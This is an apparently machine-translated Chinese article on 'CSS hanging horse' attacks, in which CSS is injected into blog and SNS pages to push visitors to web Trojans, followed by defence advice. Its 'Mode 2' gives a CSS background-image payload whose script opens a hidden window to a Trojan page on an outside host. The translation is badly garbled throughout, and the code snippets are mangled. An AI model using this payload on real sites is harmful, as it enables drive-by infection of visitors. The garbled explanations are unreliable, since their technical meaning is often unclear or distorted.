The CSS hangs the horse and the corresponding guard method

The CSS code used to make Web effects can also be used to hang horses.

With the popularity of Web2.0, a variety of Web page special effects are used more and more, which also gives hackers an opportunity. They found that the CSS code used to make Web effects could also be used to hang horses. The irony is that the way the CSS hanging horse is actually from the prevention of e-hanging of the horse's CSS code evolved.

The website hangs the horse the means originally very unitary, but along with the Web2.0 technology as well as the blog, the wiki and so on widespread application, hangs the horse also to emerge the various technology, in which the CSS hangs the horse way, may say is the Web2.0 age hacker's most loves. There are many very famous websites have been hacked by hackers using CSS to hang the horse.

We suggest that when you click on unfamiliar links, a lot of heart, big site is also likely to be hung horse. When you are surfing the Internet, it is best to use some of the security aids with the Web Trojan interception function.

Why does the hacker choose CSS to hang the horse?

In the Web1.0 era, the use of e hanging horse for hackers, rather than to better realize the hidden Trojan, rather than a helpless choice. In simple HTML Web pages and the lack of interactive Web sites, hackers can use a very limited means, even if the adoption of complex camouflage, it is easy to see through, not as good as e direct and effective.

But now the interactive Web2.0 website is more and more, allowing users to set up and modify the blog, SNS community and so on appear. These highly interactive communities and blogs tend to provide rich functionality and allow users to use CSS cascading style sheets to make free changes to the site's web pages, prompting the CSS to pop.

Small Encyclopedia:

CSS is the English abbreviation for Cascading style sheets (cascadingstylesheets). The main purpose of CSS is to separate the structure of the file (written in HTML or other related languages) from the display of the file. This separation can enhance the readability of the file and make the file more flexible.

The hacker uses the CSS to hang the horse, often is borrows the netizen to some big website's trust, the CSS malicious code hangs to the blog or other supports the CSS webpage, when Netizen accesses this webpage the malicious code will carry on. It's like you go to a well-known and fully licensed large hospital, you trust the hospital, but you see the clinic has been outsourced by the quack, and in the name of the hospital to use your trust to successfully deceive you. But when you go to find someone afterwards, the hospital is often a face innocent. For security engineers, CSS hanging horse's troubleshooting is essential common sense.

CSS horse attack and defense record

The way to attack CSS is more, but the mainstream way is through the loophole of the blog or SNS social networking site system, the malicious CSS code to support the personalized page CSS features. Below we take a typical CSS hanging horse way for example to explain.

Mode 1:

Body

The main function of "Background-image" in CSS is to define the background picture of the page. This is the most typical CSS hanging horse way, this malicious code is mainly through the "background-image" with T code to let the Web Trojan quietly in the user's computer run.

So how do you hang this CSS malicious code into a normal Web page? Hackers can put the generated Trojan horse to their designated location, and then the malicious code into the Web page of the horse, or a horse page called the CSS file.

Small Encyclopedia:

Use the Body object elements, mainly in order to let objects no longer change the content of the entire Web page document, through the control of the body object, you can control the content or effect within the specified size, as with the Div object to set the exact size.

Mode 2:

Body

Background-image:url (T:open ("http://www"). X.com/muma.htm "," NewWindow "," border= "1" height=0, width=0, top=1000, center=0, Toolbar=no,menubar=no, Scrollbars=no, Resizable=no,location=no,status=no "))

Mode 1 of the CSS hanging Horse technology, in the runtime will appear blank pages, affecting the normal access of web visitors, it is easier to find. However, this code in mode 2 uses the open window of T, opens a hidden window, silently runs a new window in the background and activates access to the Web page overflow Trojan page, does not affect visitors to view the content of the Web page, so more covert.

Anti-network servers are hanging horses, and information such as anti-virus software alarms is usually present. As a result of constantly updated vulnerabilities, horse types at all times in the transformation, through the reflection of the client to find whether the server is hanging horse often overlooked larger. The correct way is to often check the server log, find unusual information, often check the site code, use the Web Trojan detection system, for troubleshooting.

At present, in addition to using the previous blocking pop-up window to prevent the use of CSS, you can also set CSS filter in the Web page, the CSS filter out. However, if you choose to filter CSS, first of all, you need to pay attention to their relevant web page has CSS content, so we still have to block the way to prevent CSS. The blocking code looks like this:

Emiao1:expression (this.src= "About:blank", this.outerhtml= "");